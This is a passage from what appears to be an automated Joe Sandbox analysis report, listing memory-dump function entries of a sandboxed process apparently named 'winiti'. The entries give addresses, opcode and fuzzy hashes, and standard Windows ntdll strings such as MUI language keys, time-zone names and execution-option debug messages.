                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                          • Instruction ID: ba27d4cd5f553268e31cb600e7e3d5a3e50323ff6ed211678ad30f7188510e08
                          • Opcode Fuzzy Hash: 5f2af904bd49f46abffdb2c3bdfb425abd6ec71f3c15e3442cbf597b06952ad7
                          • Instruction Fuzzy Hash: 39B01272100540C7E319A714D90AB5B7250FF80F00F00893AE10781861DB38992CD456
                          Function 008DFC60 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                          Function 008DFD8C Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                          Function 008E1D80 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                          • Instruction ID: c40cb18f784fb740092d7f35057b9839572fe11e4001cfe90af8ac8386c88b07
                          • Opcode Fuzzy Hash: 18add7eb1c2e7e0a1a3b96ba9e1590d2475205760e881687e9c53b2b1b4fe652
                          • Instruction Fuzzy Hash: A6B09271508A40C7E204A704D985B46B221FB90B00F408938A04B865A0D72CA928C686
                          Function 008DFD5C Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                          • Instruction ID: 152fdd420af7dfcc6df86c72954370e6eab1db85fd0a81c34441345ed48de2b3
                          • Opcode Fuzzy Hash: 41f935964cbdc9d6e59f893e4d9d45654507f6024dc22a4db73dc1be4add7f46
                          • Instruction Fuzzy Hash: 27B01272141540C7E349A714D90AB6B7220FB80F00F00893AE00781852DB389B2CD98A
                          Function 008DFEA0 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                          Function 008DFED0 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                          Function 008DFE24 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                          • Instruction ID: 4523e9276363b51c29093556ee00c3605be97a6a096d126b10744d78506899f7
                          • Opcode Fuzzy Hash: 2e7bb4dc02deca6488bcbd727a6b6eb413310111d5b181e4d110d688bd4fe620
                          • Instruction Fuzzy Hash: E7B012B2104580C7E31A9714D906B4B7210FB80F00F40893AA00B81861DB389A2CD456
                          Function 008DFFB4 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                          Function 008DFFFC Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                          • Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
                          • Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
                          • Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B
                          Function 008DFF34 Relevance: .0, Instructions: 6COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                          • Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
                          • Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
                          • Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A
                          Function 00908788 Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • Kernel-MUI-Language-SKU, xrefs: 009089FC
                          • Kernel-MUI-Language-Allowed, xrefs: 00908827
                          • WindowsExcludedProcs, xrefs: 009087C1
                          • Kernel-MUI-Number-Allowed, xrefs: 009087E6
                          • Kernel-MUI-Language-Disallowed, xrefs: 00908914
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: _wcspbrk
                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                          • API String ID: 402402107-258546922
                          • Opcode ID: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                          • Instruction ID: d5b8b31f5906aec0b39d198ffaf365a0d44bee7c5842811dc6851a4495d599da
                          • Opcode Fuzzy Hash: b0295194600aac96e902859a30d56bc301bdc7d0a680cc4dc90685d52cca2927
                          • Instruction Fuzzy Hash: 01F1F8B2D00649EFCF11EF99C981AEEBBB8FF08300F14446AE515E7251EB349A45DB61
                          Function 0097822C Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: _wcsnlen
                          • String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
                          • API String ID: 3628947076-1387797911
                          • Opcode ID: 94cc65138088aaf12ac7b9c706a31ea4c9d1c57bfd2816538c7d431ced99241e
                          • Instruction ID: 3905be80095cfb6ff74068722eab242d8ad30eb49863eaa65b396ecb213c7b51
                          • Opcode Fuzzy Hash: 94cc65138088aaf12ac7b9c706a31ea4c9d1c57bfd2816538c7d431ced99241e
                          • Instruction Fuzzy Hash: 5041B877288209BAEB119AE5CC4AFDFB76CEF44B44F108112FA08D5191DBB0DB119BB4
                          Function 009213CB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                          • Instruction ID: fa12d8b7a289918ab0646b0c93a12e58c6cad99d3e65512d48ca47a8b15c9844
                          • Opcode Fuzzy Hash: a403977b2df3a340a5bc4f0f3bf8d28a811274723920e54991703c20bf4ba03c
                          • Instruction Fuzzy Hash: 1B614B71A04665A6CF34DF99D8808BEBBBAFFE5300B14C42DF4DA47684D374AA50CB60
                          Function 00983B8E Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          • Opcode ID: 166c9c3691c59b01739987b355ce8103c9fba79d72c3c2f2340eb276ad7a32ef
                          • Instruction ID: 6f7eaef54e234bf2db67bbd9f57db28a6a4cd768a0ea0da92bf265e6188815c8
                          • Opcode Fuzzy Hash: 166c9c3691c59b01739987b355ce8103c9fba79d72c3c2f2340eb276ad7a32ef
                          • Instruction Fuzzy Hash: 8D61A3B2900648ABCF20EFADC84197E7BF9EF59710B14C529FCE997241E274EB419B50
                          Function 00917EFD Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                          Download Yara Rule
                          APIs
                          • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00933F12
                          Strings
                          • ExecuteOptions, xrefs: 00933F04
                          • Execute=1, xrefs: 00933F5E
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0093E2FB
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00933F4A
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 0093E345
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00933EC4
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00933F75
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: BaseDataModuleQuery
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 3901378454-484625025
                          • Opcode ID: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
                          • Instruction ID: 41e9fa84d98052e166f9121288f570dd953eeb524a931df6e2d59f36ad310da4
                          • Opcode Fuzzy Hash: ff7baaf40b6bf58b9e4e48120d924cbc832683b053e0247b933c9944f3afab8d
                          • Instruction Fuzzy Hash: 7441B771B8021D7ADF20DA95DC86FEBB3BCEB55700F0005A9B505E6181EA70DB86CF61
                          Function 00920B15 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009D0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_8c0000_winiti.jbxd
                          Similarity
                          • API ID: __fassign
                          • String ID: .$:$:
                          • API String ID: 3965848254-2308638275
                          • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                          • Instruction ID: e7518ee24c2a4bf2819fd4e7c2a167ef7b5dd7bafd6ddcd47e9d4fd54f6df8fb
                          • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                          • Instruction Fuzzy Hash: 1DA18DB1D0032ADFDF24CF64E8456BEB7B8BBD5304F24856AD482A724BD6349A41CB51
                          Function 00920554 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                          Download Yara Rule
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00942206
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.489080424.00000000008D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008C0000, based on PE: true
                          • Associated: 00000009.00000002.489080424.00000000008C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C0000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C4000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000009.00000002.489080424.00000000009C7000.00000040.00001000.00020000.00000000.sdmpDownload File
